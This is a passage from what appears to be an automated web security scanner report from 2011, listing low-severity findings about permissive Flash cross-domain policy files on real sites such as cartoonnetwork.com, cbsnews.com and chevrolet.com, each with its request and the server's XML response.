ETag: "d62146eddfb7cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-PBY: REBEL14
Date: Sat, 02 Apr 2011 12:42:25 GMT
Connection: close
Content-Length: 842

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.careerbuilder.com" />
<allow-access-from domain="img.icbdr.com" />
<allow-access-from domain="img.cbdr.com" />
<allow-access-from domain="*.icbdr.com" />
<allow-access-from domain="*.cbdr.com" />
<allow-access-from domain="*.jobbguiden.se" />
<allow-access-from domain="*.jobbingmall.nl" />
<allow-access-from domain="*.careerbuilder.de" />
<allow-access-from domain="*.careerbuilder.no" />
<allow-access-from domain="*.careerbuilder.ch" />
<allow-access-from domain="*.kariera.gr" />
<allow-access-from domain="*.careerbuilder.gr" />
<allow-access-from domain="*.careerbuilder.fr" />
...[SNIP]...

7.197. http://www.careerrookie.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.careerrookie.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.careerrookie.com

Response

HTTP/1.1 200 OK
Cache-Control: no-cache
Content-Type: text/xml
Last-Modified: Wed, 19 Jan 2011 13:51:09 GMT
Accept-Ranges: bytes
ETag: "d62146eddfb7cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-PBY: BEAR21
Date: Sat, 02 Apr 2011 14:02:26 GMT
Connection: close
Content-Length: 842

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.careerbuilder.com" />
<allow-access-from domain="img.icbdr.com" />
<allow-access-from domain="img.cbdr.com" />
<allow-access-from domain="*.icbdr.com" />
<allow-access-from domain="*.cbdr.com" />
<allow-access-from domain="*.jobbguiden.se" />
<allow-access-from domain="*.jobbingmall.nl" />
<allow-access-from domain="*.careerbuilder.de" />
<allow-access-from domain="*.careerbuilder.no" />
<allow-access-from domain="*.careerbuilder.ch" />
<allow-access-from domain="*.kariera.gr" />
<allow-access-from domain="*.careerbuilder.gr" />
<allow-access-from domain="*.careerbuilder.fr" />
...[SNIP]...

7.198. http://www.carnival.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.carnival.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.carnival.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Fri, 28 Jan 2011 19:48:23 GMT
Accept-Ranges: bytes
ETag: "c4bc715224bfcb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 218
Date: Sat, 02 Apr 2011 13:56:17 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.googlesyndication.com"/><allow-access-from domain="*.feedburner.com"/>
</cr
...[SNIP]...

7.199. http://www.cars.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cars.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cars.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:37:45 GMT
Server: IBM_HTTP_Server
Last-Modified: Thu, 14 May 2009 14:15:36 GMT
ETag: "9c38-27a-f632f200"
Accept-Ranges: bytes
Content-Length: 634
P3P: policyref="/w3c/p3p.xml", CP="ALL DEM ONL PHY PUR CUR OUR BUS IND"
Connection: close
Content-Type: text/xml
Set-Cookie: cars_persist=3980465324.20480.0000; expires=Sat, 02-Apr-2011 14:08:01 GMT; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<allow-access-from domain="*.cars.com" />
<allow-access-from domain="*.brightcove.com" />
<allow-access-from domain="*.2o7.net" />
...[SNIP]...

7.200. http://www.cartoonnetwork.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cartoonnetwork.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cartoonnetwork.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:47 GMT
Server: Apache
Last-Modified: Tue, 21 Dec 2010 13:56:44 GMT
Content-Length: 11666
Cache-Control: max-age=600
Expires: Sat, 02 Apr 2011 13:40:34 GMT
Content-Type: application/xml
Connection: close
X-Pad: avoid browser bug

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*.cartoonnet
...[SNIP]...
<allow-access-from domain="*.cartoonnetwork.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="cartoonnetwork.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cartoonnetwork.tv" />
   <allow-access-from domain="www.cartoonnetwork.tv" />
   <allow-access-from domain="cartoonnetwork.tv" />
   <allow-access-from domain="*.cartoonnetwork.us" />
   <allow-access-from domain="www.cartoonnetwork.us" />
   <allow-access-from domain="cartoonnetwork.us" />
   <allow-access-from domain="www.cartoon.co.jp" />
   <allow-access-from domain="cartoon.co.jp" />
...[SNIP]...
<allow-access-from domain="www.cartoonnetworkindia.com" />
   <allow-access-from domain="cartoonnetworkindia.com" />
...[SNIP]...
<allow-access-from domain="www.cartoonnetworkasia.com" />
   <allow-access-from domain="cartoonnetworkasia.com" />
   <allow-access-from domain="www.adultswim.com.au" />
   <allow-access-from domain="adultswim.com.au" />
   <allow-access-from domain="www.pogo.tv" />
   <allow-access-from domain="pogo.tv" />
   <allow-access-from domain="www.cartoonnetworkya.com" />
   <allow-access-from domain="cartoonnetworkya.com" />
   <allow-access-from domain="www.cartoonnetworkla.com" />
   <allow-access-from domain="cartoonnetworkla.com" />
...[SNIP]...
<allow-access-from domain="www.cartoonnetwork.cl" />
   <allow-access-from domain="cartoonnetwork.cl" />
   <allow-access-from domain="www.adultswimla.com" />
   <allow-access-from domain="adultswimla.com" />
   <allow-access-from domain="www.adultswim.com.ar" />
   <allow-access-from domain="adultswim.com.ar" />
   <allow-access-from domain="www.adultswim.cl" />
   <allow-access-from domain="adultswim.cl" />
   <allow-access-from domain="www.adultswim.com.mx" />
   <allow-access-from domain="adultswim.com.mx" />
   <allow-access-from domain="www.adultswim.com.ve" />
   <allow-access-from domain="adultswim.com.ve" />
   <allow-access-from domain="www.adultswim.com.br" />
   <allow-access-from domain="adultswim.com.br" />
   <allow-access-from domain="www.boomerangla.com" />
   <allow-access-from domain="boomerangla.com" />
   <allow-access-from domain="www.boomerang.com.mx" />
   <allow-access-from domain="boomerang.com.mx" />
   <allow-access-from domain="www.boomerang.com.ar" />
   <allow-access-from domain="boomerang.com.ar" />
   <allow-access-from domain="www.boomerang.com.br" />
   <allow-access-from domain="boomerang.com.br" />
   <allow-access-from domain="www.boomerang.com.ve" />
   <allow-access-from domain="boomerang.com.ve" />
   <allow-access-from domain="www.boomerang.cl" />
   <allow-access-from domain="boomerang.cl" />
...[SNIP]...
<allow-access-from domain="www.cartoonnetwork.fr" />
   <allow-access-from domain="cartoonnetwork.fr" />
   <allow-access-from domain="www.cartoonnetwork.es" />
...[SNIP]...
<allow-access-from domain="www.cartoonnetwork.it" />
   <allow-access-from domain="cartoonnetwork.it" />
   <allow-access-from domain="www.cartoonnetwork.pl" />
   <allow-access-from domain="cartoonnetwork.pl" />
   <allow-access-from domain="www.cartoonnetwork.nl" />
   <allow-access-from domain="cartoonnetwork.nl" />
   <allow-access-from domain="www.cartoonnetwork.nu" />
   <allow-access-from domain="cartoonnetwork.nu" />
   <allow-access-from domain="www.cartoonnetwork.se" />
   <allow-access-from domain="cartoonnetwork.se" />
   <allow-access-from domain="www.cartoonnetwork.dk" />
   <allow-access-from domain="cartoonnetwork.dk" />
   <allow-access-from domain="www.cartoonnetwork.ro" />
   <allow-access-from domain="cartoonnetwork.ro" />
   <allow-access-from domain="www.cartoonnetwork.hu" />
   <allow-access-from domain="cartoonnetwork.hu" />
   <allow-access-from domain="www.cartoonnetwork.de" />
   <allow-access-from domain="cartoonnetwork.hu" />
   <allow-access-from domain="www.cartoonnetworkhq.net" />
   <allow-access-from domain="cartoonnetworkhq.net" />
   <allow-access-from domain="www.cartoonnetworkeurope.com" />
   <allow-access-from domain="cartoonnetworkeurope.com" />
   <allow-access-from domain="www.boomerangtv.co.uk" />
   <allow-access-from domain="boomerangtv.co.uk" />
   <allow-access-from domain="www.boomerangtv.fr" />
   <allow-access-from domain="boomerangtv.fr" />
   <allow-access-from domain="www.boomerangtv.es" />
   <allow-access-from domain="boomerangtv.es" />
   <allow-access-from domain="www.toonami.co.uk" />
   <allow-access-from domain="toonami.co.uk" />
   <allow-access-from domain="aolsvc.cartoonnetwork.kol.aol.com" />
   <allow-access-from domain="kol.cartoonnetwork.com" />
   <allow-access-from domain="www.toonamijetstream.com" />
   <allow-access-from domain="toonamijetstream.com" />
   <allow-access-from domain="*.toonamijetstream.com" />
   <allow-access-from domain="www.tickleu.com" />
   <allow-access-from domain="tickleu.com" />
   <allow-access-from domain="*.tickleu.com" />
   <allow-access-from domain="*.adultswim.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="www.adultswim.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.adultstage.turner.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="adultstage.turner.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.dubitlimited.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="otis.turner.com" secure="true"/>
...[SNIP]...
<allow-access-from domain="*.turner.com" secure="true" />
...[SNIP]...
<allow-access-from domain="staging.cartoonnetwork.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="aud-ite.cartoonnetwork.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="mmstage.cartoonnetwork.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="aud-ite.fusionfall.com" secure="false" />
...[SNIP]...
<allow-access-from domain="audience.cartoonnetwork.com" secure="false" />
...[SNIP]...
<allow-access-from domain="topscores.cartoonnetwork.com" secure="false" />
...[SNIP]...
<allow-access-from domain="s.cnn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cnn.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.cnn.net" secure="true" />
...[SNIP]...
<allow-access-from domain="ref-avtr.cartoonnetwork.com" secure="true" />
...[SNIP]...
<allow-access-from domain="mastercontrol.cartoonnetwork.com" />
   <allow-access-from domain="minimatch.cartoonnetwork.com" secure="false" />
...[SNIP]...
<allow-access-from domain="gamecreator.cartoonnetwork.com" secure="false" />
...[SNIP]...
<allow-access-from domain="gcstage.cartoonnetwork.com" secure="false" />
...[SNIP]...
<allow-access-from domain="www.fusionfall.com" />
   <allow-access-from domain="staging.fusionfall.com" />
   <allow-access-from domain="fusionfall.com" />
   <allow-access-from domain="clearspringcnn.blogspot.com" />
   <allow-access-from domain="*.clearspring.com" />
   <allow-access-from domain="*.cdn.turner.com" secure="true" />
...[SNIP]...
<allow-access-from domain="ht.cdn.turner.com" secure="true" />
...[SNIP]...
<allow-access-from domain="cnn-0.vo.llnwd.net" secure="true" />
...[SNIP]...
<allow-access-from domain="cnn-1.vo.llnwd.net" secure="true" />
...[SNIP]...
<allow-access-from domain="cnn-2.vo.llnwd.net" secure="true" />
...[SNIP]...
<allow-access-from domain="cnn-3.vo.llnwd.net" secure="true" />
...[SNIP]...
<allow-access-from domain="cnn-4.vo.llnwd.net" secure="true" />
...[SNIP]...
<allow-access-from domain="cnn-5.vo.llnwd.net" secure="true" />
...[SNIP]...
<allow-access-from domain="cnn-6.vo.llnwd.net" secure="true" />
...[SNIP]...
<allow-access-from domain="cnn-7.vo.llnwd.net" secure="true" />
...[SNIP]...
<allow-access-from domain="cnn-8.vo.llnwd.net" secure="true" />
...[SNIP]...
<allow-access-from domain="cnn-9.vo.llnwd.net" secure="true" />
...[SNIP]...
<allow-access-from domain="cnn.vo.llnwd.net" secure="false"/>
...[SNIP]...
<allow-access-from domain="http-trd-ak.cdn.turner.com" secure="true" />
...[SNIP]...
<allow-access-from domain="http-trd-l3.cdn.turner.com" secure="true" />
...[SNIP]...
<allow-access-from domain="teg8devapp1.turner.com" />
   <allow-access-from domain="teg8frev1.turner.com" secure="false" />
...[SNIP]...
<allow-access-from domain="www.cryptidsarereal.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.cryptidsarereal.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="redesign.cartoonnetwork.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="i.cartoonnetwork.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="pollserver.cartoonnetwork.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.addictinggames.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.miniclip.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.roblox.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.wildtangent.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="gts.dartmotif.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cartoonnetwork.moxieinteractive.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cn.moxieinteractive.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*nbakidsp1dev1.turner.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.funnygarbage.com" secure="false"/>
...[SNIP]...

7.201. http://www.casttv.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.casttv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.casttv.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.53
Date: Sat, 02 Apr 2011 13:45:50 GMT
Content-Type: text/xml; charset=utf-8
Content-Length: 219
Last-Modified: Tue, 10 Jun 2008 19:51:24 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.casttv.com" />
</c
...[SNIP]...

7.202. http://www.cbc.ca/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cbc.ca
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cbc.ca

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Thu, 31 Mar 2011 19:58:16 GMT
ETag: "cc015-1aa-b6cee600"
X-Origin-Server: web23:sb10
Content-Type: text/xml
Date: Sat, 02 Apr 2011 14:00:02 GMT
Content-Length: 426
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- $Id: cbc.ca-crossdomain.xml 900 2010-01-25 14:26:10Z dunnj $ -->
<cross-
...[SNIP]...
<allow-access-from domain="*.cbc.ca" />
<allow-access-from domain="*.mavenapps.net"/>
<allow-access-from domain="*.cbcmediasales.ca"/>
<allow-access-from domain="*.qa.nm.cbc.ca"/>
...[SNIP]...

7.203. http://www.cbsnews.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.cbsnews.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.cbsnews.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "1b334cb-5ef-4889f0a0bdfdd"
Last-Modified: Wed, 09 Jun 2010 20:49:16 GMT
Accept-Ranges: bytes
Content-Length: 1519
Content-Type: application/xml
Cache-Control: max-age=300
Expires: Sat, 02 Apr 2011 13:29:11 GMT
Date: Sat, 02 Apr 2011 13:24:11 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="cbsnews.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cbsnews.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cbs.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.cbsnews.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.cbs.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="www.cbsnew.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="wwwimage.cbsnews.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="cgi.cbsnews.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="video.cgi.cbsnews.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cbssports.com"/>
<allow-access-from domain="*.cbsinteractive.com"/>
<allow-access-from domain="*.cnet.com"/>
<allow-access-from domain="*.cnettv.com"/>
<allow-access-from domain="cgi.cbs.com" to-ports="*" secure="false" />
...[SNIP]...
<allow-access-from domain="video.cgi.cbs.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.sportsline.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.sportsline.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.*.sportsline.com" to-ports="*" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.cooliris.com" to-ports="*" secure="false"/>
...[SNIP]...

7.204. http://www.chacha.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.chacha.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.chacha.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: sessionId=MjFhZDhhZmYtZTdkMS00NTVkLWEwMzUtZWNkOGZiMGY3Yzg5o6b4; Expires=Sat, 23-Apr-2011 08:43:29 GMT; Path=/
Set-Cookie: sessionId=OTkxNTVhMmUtYWNkNS00MDdmLWJmNTUtYzk5ODAwOGJlMTg2o6b4; Expires=Sat, 23-Apr-2011 08:43:29 GMT; Path=/
Set-Cookie: wuid=NDE0Y2Q4MWYtYjM4ZC00NGM5LThhNDAtMjc4M2E1NmEzOWNho6b4; Expires=Sun, 01-Apr-2012 12:43:29 GMT; Path=/
Set-Cookie: seenUser=dHJ1ZQ%3D%3Do6b4; Expires=Fri, 01-Jul-2011 12:43:29 GMT; Path=/
Set-Cookie: sessionId=MjZhOWMxODMtYTllMy00YTViLTg5NDktNGVhZjJkNDZhMGJjo6b4; Expires=Sat, 23-Apr-2011 08:43:29 GMT; Path=/
Content-disposition: inline
Content-Type: text/xml;charset=UTF-8
Content-Language: en-US
Content-Length: 297
Date: Sat, 02 Apr 2011 12:43:28 GMT
Connection: close

<cross-domain-policy>

<site-control permitted-cross-domain-policies="all"/>
   <allow-access-from domain="*.chacha.bz" secure="false"/>
<allow-access-from domain="*.chacha.com" secure="false"/>
   <
...[SNIP]...

7.205. http://www.charlotteobserver.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.charlotteobserver.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.charlotteobserver.com

Response

HTTP/1.0 200 OK
Server: Apache/1.3.41
Last-Modified: Thu, 17 Dec 2009 22:05:10 GMT
ETag: "ea0d60-df-4b2aab16"
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:58:32 GMT
Content-Length: 223
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.charlotteobserver.com" />

...[SNIP]...

7.206. http://www.chemistry.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.chemistry.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.chemistry.com

Response

HTTP/1.1 200 OK
Content-Length: 296
Content-Type: text/xml
Last-Modified: Tue, 30 Jan 2007 22:50:53 GMT
Accept-Ranges: bytes
ETag: "6cb05b18c144c71:53b"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:43:53 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.chemistry.com" secure="true" />
...[SNIP]...
<allow-access-from domain="*.match.com" secure="true" />
...[SNIP]...

7.207. http://www.chevrolet.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.chevrolet.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.chevrolet.com

Response

HTTP/1.0 200 OK
Server: Apache
X-Pillar-Name: VAPROD
Content-Type: application/xml
Date: Sat, 02 Apr 2011 13:50:52 GMT
Content-Length: 4088
Connection: close

<?xml version="1.0" encoding="UTF-8"?>
<cross-domain-policy xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:noNamespaceSchemaLocation="http://www.adobe.com/xml/schemas/PolicyFile.xsd">
<allow-access-from domain="www.caranddriver.com" />
<allow-access-from domain="www.roadandtrack.com" />
<allow-access-from domain="www.jdpower.com" />
<allow-access-from domain="www.consumerguide.com" />
<allow-access-from domain="www.vehix.com" />
<allow-access-from domain="www.carsoup.com" />
<allow-access-from domain="www.cargurus.com" />
<allow-access-from domain="www.shopping.com" />
<allow-access-from domain="www.usnews.com" />
<allow-access-from domain="www.hybridcar.com" />
<allow-access-from domain="www.automedia.com" />
<allow-access-from domain="www.autospies.com" />
<allow-access-from domain="www.leftlanenews.com" />
<allow-access-from domain="www.autoweek.com" />
<allow-access-from domain="www.automart.com" />
<allow-access-from domain="www.thecarconnection.com" />
<allow-access-from domain="www.autotrader.com" />
<allow-access-from domain="www.autobytel.com" />
<allow-access-from domain="www.autoweb.com" />
<allow-access-from domain="www.autosite.com" />
<allow-access-from domain="www.car.com" />
<allow-access-from domain="www.carsmart.com" />
<allow-access-from domain="www.hybrid.com" />
<allow-access-from domain="www.myride.com" />
<allow-access-from domain="www.kbb.com" />
<allow-access-from domain="autos.yahoo.com" />
<allow-access-from domain="autos.msn.com" />
<allow-access-from domain="autos.aol.com" />
<allow-access-from domain="www.cars.com" />
<allow-access-from domain="www.edmunds.com" />
<allow-access-from domain="motifcdn.doubleclick.net"/>
<allow-access-from domain="*.brightcove.com" secure="false" />
...[SNIP]...
<allow-access-from domain="m.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="m2.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="m3.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="m.2mdn.net"/>
...[SNIP]...
<allow-access-from domain="m2.2mdn.net"/>
...[SNIP]...
<allow-access-from domain="betadfa.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="dfa.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="motifcdn2.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="ad.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="m1.2mdn.net"/>
...[SNIP]...
<allow-access-from domain="*.doubleclick.net"/>
...[SNIP]...
<allow-access-from domain="*.2mdn.net"/>
...[SNIP]...
<allow-access-from domain="*.static.2mdn.net"/>
...[SNIP]...
<allow-access-from domain="*.s0.2mdn.net"/>
...[SNIP]...
<allow-access-from domain="*.s1.2mdn.net"/>
...[SNIP]...
<allow-access-from domain="presentations.digitas.com" />
...[SNIP]...

7.208. http://www.chicagotribune.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.chicagotribune.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.chicagotribune.com

Response

HTTP/1.0 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Length: 436
Content-Type: text/xml
P3P: policyref="http://www.chicagotribune.com/w3c/p3p.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi TELi OUR DELa SAMi UNRi OTRi IND PHY ONL UNI PUR COM NAV INT DEM STA POL HEA PRE"
Last-Modified: Thu, 03 Mar 2011 03:55:01 GMT
ETag: "1b4-4d6f1115"
Accept-Ranges: bytes
Date: Sat, 02 Apr 2011 13:32:26 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="all"/>

...[SNIP]...
<allow-access-from domain="*.wibbitz.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.brightcove.com" secure="false" />
...[SNIP]...

7.209. http://www.chow.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.chow.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

